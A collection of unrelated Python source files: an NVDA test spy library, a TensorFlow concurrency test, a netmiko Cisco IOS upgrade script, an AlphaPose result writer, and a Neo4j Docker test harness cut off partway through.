def _onNvdaSpeech(self, speechSequence=None):
if not speechSequence:
return
with self._speechLock:
self._lastSpeechTime_requiresLock = _timer()
self._nvdaSpeech_requiresLock.append(speechSequence)
@staticmethod
def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
return ''.join(baseStrings).strip()
def _getSpeechAtIndex(self, speechIndex):
with self._speechLock:
return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])
def get_speech_at_index_until_now(self, speechIndex: int) -> str:
""" All speech from (and including) the index until now.
@param speechIndex:
@return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
"""
with self._speechLock:
speechCommands = [
self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
]
return "\n".join(x for x in speechCommands if x and not x.isspace())
def get_last_speech_index(self) -> int:
with self._speechLock:
return len(self._nvdaSpeech_requiresLock) - 1
def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
if searchAfterIndex is None:
firstIndexToCheck = 0
else:
firstIndexToCheck = 1 + searchAfterIndex
with self._speechLock:
for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
index = index + firstIndexToCheck
baseStrings = [c.strip() for c in commands if isinstance(c, str)]
if any(speech in x for x in baseStrings):
return index
return -1
def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
with self._speechLock:
started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
return started and finished
def setBrailleCellCount(self, brailleCellCount: int):
import brailleViewer
brailleViewer.DEFAULT_NUM_CELLS = brailleCellCount
def _getBrailleAtIndex(self, brailleIndex: int) -> str:
with self._brailleLock:
return self._nvdaBraille_requiresLock[brailleIndex]
def get_braille_at_index_until_now(self, brailleIndex: int) -> str:
""" All raw braille text from (and including) the index until now.
@param brailleIndex:
@return: The raw text, each update on a new line
"""
with self._brailleLock:
rangeOfInterest = self._nvdaBraille_requiresLock[brailleIndex:]
return "\n".join(rangeOfInterest)
def get_last_braille_index(self) -> int:
with self._brailleLock:
return len(self._nvdaBraille_requiresLock) - 1
def _devInfoToLog(self):
import api
obj = api.getNavigatorObject()
if hasattr(obj, "devInfo"):
log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
else:
log.info("No developer info for navigator object")
def dump_speech_to_log(self):
log.debug("dump_speech_to_log.")
with self._speechLock:
try:
self._devInfoToLog()
except Exception:
log.error("Unable to log dev info")
try:
log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
except Exception:
log.error("Unable to log speech")
def dump_braille_to_log(self):
log.debug("dump_braille_to_log.")
with self._brailleLock:
try:
log.debug(f"All braille:\n{repr(self._nvdaBraille_requiresLock)}")
except Exception:
log.error("Unable to log braille")
def _minTimeout(self, timeout: float) -> float:
"""Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
return min(timeout, self._maxKeywordDuration)
def init_max_keyword_duration(self, maxSeconds: float):
"""This should only be called once, immediately after importing the library.
@param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
this value is greater than the value for the `robot.libraries.Remote` instance it may mean that the test
is failed, and NVDA is never exited, requiring manual intervention.
Should be set to a large value like '30' (seconds).
"""
self._maxKeywordDuration = maxSeconds - 1
def wait_for_NVDA_startup_to_complete(self):
_blockUntilConditionMet(
getValue=lambda: self._isNvdaStartupComplete,
giveUpAfterSeconds=self._minTimeout(10),
errorMessage="Unable to connect to nvdaSpy",
)
self.reset_all_speech_index()
def get_last_speech(self) -> str:
return self._getSpeechAtIndex(-1)
def get_all_speech(self) -> str:
return self.get_speech_at_index_until_now(self._allSpeechStartIndex)
def reset_all_speech_index(self) -> int:
self._allSpeechStartIndex = self.get_last_speech_index()
return self._allSpeechStartIndex
def get_next_speech_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_speech_index() + 1
def wait_for_specific_speech(
self,
speech: str,
afterIndex: Optional[int] = None,
maxWaitSeconds: int = 5,
) -> int:
"""
@param speech: The speech to expect.
@param afterIndex: The speech should come after this index. The index is exclusive.
@param maxWaitSeconds: The amount of time to wait in seconds.
@return: the index of the speech.
"""
success, speechIndex = _blockUntilConditionMet(
getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
intervalBetweenSeconds=0.1,
errorMessage=None
)
if not success:
self.dump_speech_to_log()
raise AssertionError(
"Specific speech did not occur before timeout: {}\n"
"See NVDA log for dump of all speech.".format(speech)
)
return speechIndex
def wait_for_speech_to_finish(
self,
maxWaitSeconds=5.0,
speechStartedIndex: Optional[int] = None
):
_blockUntilConditionMet(
getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage="Speech did not finish before timeout"
)
def wait_for_braille_update(
self,
nextBrailleIndex: int,
maxWaitSeconds=5.0,
):
"""Wait until there is at least a single update.
@note there may be subsequent braille updates. This method does not confirm updates are finished.
"""
_blockUntilConditionMet(
getValue=lambda: self.get_last_braille_index() == nextBrailleIndex,
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage=None
)
def get_last_braille(self) -> str:
return self._getBrailleAtIndex(-1)
def get_next_braille_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_braille_index() + 1
def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
"""
Emulates a key press using NVDA's input gesture framework.
The key press will either result in a script being executed, or the key being sent on to the OS.
By default this method will block until any script resulting from this key has been executed,
and the NVDA core has again gone back to sleep.
@param kbIdentifier: an NVDA keyboard gesture identifier.
0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
E.g. control+shift+downArrow.
See vkCodes.py in the NVDA source directory for valid key names.
"""
gesture = KeyboardInputGesture.fromName(kbIdentifier)
inputCore.manager.emulateGesture(gesture)
if blockUntilProcessed:
# Emulating may have queued a script or events.
# Insert our own function into the queue after, and wait for that to be also executed.
queueProcessed = set()
def _setQueueProcessed():
nonlocal queueProcessed
queueProcessed = True
queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
_blockUntilConditionMet(
getValue=lambda: queueProcessed,
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for key to be processed",
)
# We know that by now the core will have woken up and processed the scripts, events and our own function.
# Wait for the core to go to sleep,
# Which means there is no more things the core is currently processing.
_blockUntilConditionMet(
getValue=lambda: watchdog.isCoreAsleep(),
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for core to sleep again",
)
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
def __init__(self):
super().__init__()
self._server = None
self._start()
def _start(self):
log.debug("SystemTestSpyServer started")
spyLibrary = NVDASpyLib() # spies on NVDA
RobotRemoteServer = _importRobotRemoteServer()
server = self._server = RobotRemoteServer(
spyLibrary, # provides library behaviour
port=8270, # default:8270 is `registered by IANA` for remote server usage. Two ASCII values, RF.
serve=False # we want to start this serving on another thread so as not to block.
)
log.debug("Server address: {}".format(server.server_address))
server_thread = threading.Thread(target=server.serve, name="RF Test Spy Thread")
server_thread.start()
def terminate(self):
log.debug("Terminating the SystemTestSpyServer")
self._server.stop()
def _crashNVDA():
ctypes.windll.Kernel32.DebugBreak()
GlobalPlugin = SystemTestSpyServer
GlobalPlugin.__gestures = {
}
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
self.evaluate(variables.global_variables_initializer())
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
self.evaluate(variables.global_variables_initializer())
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
self.evaluate(p.initializer)
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
self.evaluate(p.initializer)
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
upgrade IOS v2.py
|
from tkinter import *
from tkinter import ttk
import random
import os
import re
import socket
import sys
import netmiko
import time
import multiprocessing
from getpass import getpass
from netmiko import ConnectHandler, SCPConn
#Debug
import logging
logging.basicConfig(filename='test.log', level=logging.DEBUG)
logger = logging.getLogger("netmiko")
#Debug
def ssh_command(ip,username,password):
try:
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
return net_connect.send_command_expect('show ver')
except:
failtext = ip + " Couldn't be SSHed to "
to_doc("fails.csv", failtext)
def read_in_info(file_name):
print (file_name)
tmp = []
for line in open(file_name, 'r').readlines():
line = remove_return(line)
line = line.split(',')
tmp.append(line)
return tmp
def remove_return(entry):
tmp = entry.rstrip('\n')
return tmp
def get_ip (input):
return(re.findall(r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input))
def read_devices (file_name):
for line in open(file_name, 'r').readlines():
if get_ip(line):
for each in get_ip(line):
my_devices.append(each)
def to_doc(file_name, varable):
f=open(file_name, 'a')
f.write(varable)
f.write('\n')
f.close()
def find_ver(sh_ver,upgrade_info):
for each in upgrade_info:
if each[1] in sh_ver:
return each
def transfer_file(net_connect,file):
net_connect.config_mode()
net_connect.send_command('ip scp server enable')
scp_conn = SCPConn(net_connect)
s_file = file
d_file = file
scp_conn.scp_transfer_file(s_file, d_file)
try:
net_connect.send_command('no ip scp server enable')
net_connect.exit_config_mode()
except:
pass
def verify(device_type,command):
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
net_connect.config_mode()
net_connect.send_command('no ip scp server enable')
net_connect.exit_config_mode()
verify = net_connect.send_command_expect (command,delay_factor=30)
if device_type[4] in verify:
print (ip+" "+'Successfully copied and verified')
try:
net_connect.config_mode()
except:
error = ip+" "+"didn't go into config mode"
to_doc("fails.csv", error)
pass
try:
net_connect.send_command('no boot system',delay_factor=.3)
except:
error = ip + " didn't take no boot system command"
to_doc("fails.csv", error)
pass
try:
command = "boot system "+device_type[2]+device_type[3]
net_connect.send_command(command,delay_factor=.5)
except:
error = ip + " didn't take boot system command"
to_doc("fails.csv", error)
pass
try:
net_connect.exit_config_mode()
except:
error = ip + " config mode didn't exit"
to_doc("fails.csv", error)
try:
net_connect.send_command ('write memory')
start_config = net_connect.send_command ('show run | i boot')
except:
error = "'write mem' or 'show run | i boot' didn't work on "+ ip
to_doc("fails.csv", error)
pass
print (command)
#print (start_config)
if command in start_config:
print (ip +" boot statment is now correct and config is saved")
done = ip + ", boot statment is now correct and config is saved"
to_doc("success.csv",done)
elif command not in start_config:
print (4)
bootstatment = net_connect.send_command ('show boot')
# print (bootstatment)
# print (command)
temp_command = device_type[2]+device_type[3]
# print (temp_command)
if temp_command in bootstatment:
print (ip +" boot statment is now correct and config is saved")
done = ip + ", boot statment is now correct and config is saved"
print("done")
to_doc("success.csv",done)
else:
error= "Boot statment not correct on " + ip
to_doc("fails.csv", error)
else:
error= "something went wrong with " + ip
to_doc("fails.csv", error)
else:
return(verify)
def update_ios(ip,username,password,device_type):
#This part uploads the code from the device the program runs on
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
transfer_file(net_connect,device_type[3])
#This part uploads the code from the specified server
#command = 'cd '+device_type[2]
#net_connect.send_command_expect(command)
#command = 'copy scp://'+username+"@"+device_type[5]+'/'+device_type[3]+" "+device_type[2]+'/'+device_type[3]
#net_connect.send_command_timing(command)
#print (device_type[3])
#net_connect.send_command_timing(remove_return(device_type[3]))
#
#net_connect.send_command_timing(password, delay_factor=30)
##time.sleep(200)
# #print (1)
#Uncomment these lines for a slow link where the OS isn't getting copied correctly
#sleep_time = 600
#time.sleep(sleep_time)
#print (str(sleep_time/60)+' min is up, off to verify')
command = "verify "+ device_type[2]+device_type[3]
output = verify(device_type,command)
if output:
print (output)
if "No such file or directory" in output:
#print (output)
command = "verify /md5 " + device_type[2]+device_type[3]
output = verify(device_type,command)
else:
error= "something went wrong with " + ip
to_doc("fails.csv", error)
def upgradeios(ip,username,password):
upgrade_info = read_in_info('upgrade info.csv')
print (ip)
sh_ver = ssh_command(ip,username,password)
ip = remove_return(ip)
print (ip)
device_type = find_ver(sh_ver,upgrade_info)
print (device_type)
update_ios(ip,username,password,device_type)
def start_this_stuff(ip):
p1 = multiprocessing.Process(target = upgradeios, args = (ip,username,password))
p1.start()
username = input("Username: ")
password = getpass()
my_devices = []
read_devices('IPs.txt')
print (my_devices)
for ip in my_devices:
upgradeios(ip,username,password)
#print (ip)
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
result = {
'imgname': im_name,
'result': result
}
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking))
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
__init__.py
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2002-2016 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from itertools import chain
from logging import getLogger
from math import ceil
from os import makedirs
from os.path import isdir
from os.path import join as path_join
from random import choice
from threading import Thread
from time import monotonic, sleep
from xml.etree import ElementTree
from grolt.addressing import Address
from grolt.auth import Auth, make_auth
from grolt.client import AddressList, Connection
from grolt.server.console import Neo4jConsole, Neo4jClusterConsole
from grolt.server.images import resolve_image
log = getLogger("grolt")
debug_opts_type = namedtuple("debug_opts_type", ["suspend", "port"])
class Neo4jDirectorySpec:
def __init__(self,
certificates_dir=None,
import_dir=None,
logs_dir=None,
plugins_dir=None,
shared_dirs=None,
neo4j_source_dir=None,
):
self.certificates_dir = certificates_dir
self.import_dir = import_dir
self.logs_dir = logs_dir
self.plugins_dir = plugins_dir
self.shared_dirs = shared_dirs
self.neo4j_source_dir = neo4j_source_dir
def volumes(self, name):
volumes = {}
if self.certificates_dir:
volumes[self.certificates_dir] = {
"bind": "/var/lib/neo4j/certificates",
"mode": "ro",
}
if self.import_dir:
volumes[self.import_dir] = {
"bind": "/var/lib/neo4j/import",
"mode": "ro",
}
if self.logs_dir:
volumes[path_join(self.logs_dir, name)] = {
"bind": "/var/lib/neo4j/logs",
"mode": "rw",
}
if self.plugins_dir:
volumes[self.plugins_dir] = {
"bind": "/plugins",
"mode": "ro",
}
if self.shared_dirs:
for shared_dir in self.shared_dirs:
volumes[shared_dir.source] = {
"bind": shared_dir.destination,
"mode": "rw",
}
if self.neo4j_source_dir:
pom = ElementTree.parse(self.neo4j_source_dir + "/pom.xml").getroot()
xml_tag_prefix = pom.tag.split("project")[0]
neo4j_version = pom.find(xml_tag_prefix+"version").text
lib = self.neo4j_source_dir + f"/private/packaging/standalone/target/neo4j-enterprise-{neo4j_version}-unix/neo4j-enterprise-{neo4j_version}/lib"
bin = self.neo4j_source_dir + f"/private/packaging/standalone/target/neo4j-enterprise-{neo4j_version}-unix/neo4j-enterprise-{neo4j_version}/bin"
if not isdir(lib):
raise Exception(f"Could not find packaged neo4j source at {lib}\nPerhaps you need to run mvn package?")
volumes[lib] = {
"bind": "/var/lib/neo4j/lib/",
"mode": "ro",
}
volumes[bin] = {
"bind": "/var/lib/neo4j/bin/",
"mode": "ro",
}
return volumes
class Neo4jMachineSpec:
# Base config for all machines. This can be overridden by
# individual instances.
config = {
"dbms.backup.enabled": "false",
"dbms.transaction.bookmark_ready_timeout": "5s",
"dbms.routing.enabled": "true",
}
discovery_port = 5000
transaction_port = 6000
raft_port = 7000
debug_port = 5100
bolt_internal_port = 7688
def __init__(
self,
name,
service_name,
bolt_port,
http_port,
https_port,
debug_opts,
dir_spec,
config,
env
):
self.name = name
self.service_name = service_name
self.bolt_port = bolt_port
self.http_port = http_port
self.https_port = https_port
self.dir_spec = dir_spec
self.debug_opts = debug_opts
self.env = dict(env or {})
self.config = dict(self.config or {})
if debug_opts.port is not None:
self._add_debug_opts(debug_opts)
self.config["dbms.connector.bolt.advertised_address"] = \
"localhost:{}".format(self.bolt_port)
self.config["dbms.connector.http.advertised_address"] = \
"localhost:{}".format(self.http_port)
self.config["dbms.routing.advertised_address"] = \
self.bolt_internal_address
if config:
self.config.update(**config)
def __hash__(self):
return hash(self.fq_name)
@property
def fq_name(self):
return "{}.{}".format(self.name, self.service_name)
@property
def discovery_address(self):
return "{}:{}".format(self.fq_name, self.discovery_port)
@property
def transaction_address(self):
return "{}:{}".format(self.fq_name, self.transaction_port)
@property
def raft_address(self):
return "{}:{}".format(self.fq_name, self.raft_port)
@property
def http_uri(self):
return "http://localhost:{}".format(self.http_port)
@property
def bolt_address(self):
return Address(("localhost", self.bolt_port))
@property
def bolt_internal_address(self):
return "{}:{}".format(self.fq_name, self.bolt_internal_port)
def _add_debug_opts(self, debug_opts):
if debug_opts.port is not None:
suspend = "y" if debug_opts.suspend else "n"
self.env["JAVA_TOOL_OPTIONS"] = (
"-agentlib:jdwp=transport=dt_socket,server=y,"
"suspend={},address=*:{}".format(suspend, self.debug_port)
)
class Neo4jCoreMachineSpec(Neo4jMachineSpec):
def __init__(self, name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env):
config = config or {}
config["dbms.mode"] = "CORE"
super().__init__(name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env)
class Neo4jReplicaMachineSpec(Neo4jMachineSpec):
def __init__(self, name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env):
config = config or {}
config["dbms.mode"] = "READ_REPLICA"
super().__init__(name, service_name, bolt_port, http_port, https_port, debug_opts,
dir_spec, config, env)
class Neo4jMachine:
""" A single Neo4j server instance, potentially part of a cluster.
"""
container = None
ip_address = None
ready = 0
def __init__(self, spec, image, auth):
from docker import DockerClient
from docker.errors import ImageNotFound
self.spec = spec
self.image = image
self.address = Address(("localhost", self.spec.bolt_port))
self.addresses = AddressList([("localhost", self.spec.bolt_port)])
self.auth = auth
self.docker = DockerClient.from_env(version="auto")
environment = {}
if self.auth:
environment["NEO4J_AUTH"] = "/".join(self.auth)
environment["NEO4J_ACCEPT_LICENSE_AGREEMENT"] = "yes"
for key, value in self.spec.config.items():
fixed_key = "NEO4J_" + key.replace("_", "__").replace(".", "_")
environment[fixed_key] = value
for key, value in self.spec.env.items():
environment[key] = value
ports = {
"7474/tcp": self.spec.http_port,
"7473/tcp": self.spec.https_port,
"7687/tcp": self.spec.bolt_port,
}
if self.spec.debug_opts.port is not None:
ports["5100/tcp"] = self.spec.debug_opts.port
if self.spec.dir_spec:
volumes = self.spec.dir_spec.volumes(self.spec.name)
for path in volumes:
makedirs(path, exist_ok=True)
else:
volumes = None
def create_container(img):
return self.docker.containers.create(
img,
detach=True,
environment=environment,
hostname=self.spec.fq_name,
name=self.spec.fq_name,
network=self.spec.service_name,
ports=ports,
volumes=volumes,
)
try:
self.container = create_container(self.image)
except ImageNotFound:
log.info("Downloading Docker image %r", self.image)
self.docker.images.pull(self.image)
self.container = create_container(self.image)
def __hash__(self):
return hash(self.container)
def __repr__(self):
return "%s(fq_name={!r}, image={!r}, address={!r})".format(
self.__class__.__name__, self.spec.fq_name,
self.image, self.addresses)
def start(self):
from docker.errors import APIError
log.info("Starting machine %r at "
"«%s»", self.spec.fq_name, self.addresses)
try:
self.container.start()
self.container.reload()
self.ip_address = (self.container.attrs["NetworkSettings"]
["Networks"][self.spec.service_name]["IPAddress"])
except APIError as e:
log.info(e)
log.debug("Machine %r has internal IP address "
"«%s»", self.spec.fq_name, self.ip_address)
def restart(self):
from docker.errors import APIError
log.info("Restarting machine %r at "
"«%s»", self.spec.fq_name, self.addresses)
try:
self.container.restart()
self.container.reload()
self.ip_address = (self.container.attrs["NetworkSettings"]
["Networks"][self.spec.service_name]["IPAddress"])
except APIError as e:
log.info(e)
log.debug("Machine %r has internal IP address "
"«%s»", self.spec.fq_name, self.ip_address)
def ping(self, timeout):
try:
with Connection.open(*self.addresses, auth=self.auth,
timeout=timeout):
log.info("Machine {!r} available".format(self.spec.fq_name))
except OSError:
log.info("Machine {!r} unavailable".format(self.spec.fq_name))
def await_started(self, timeout):
sleep(1)
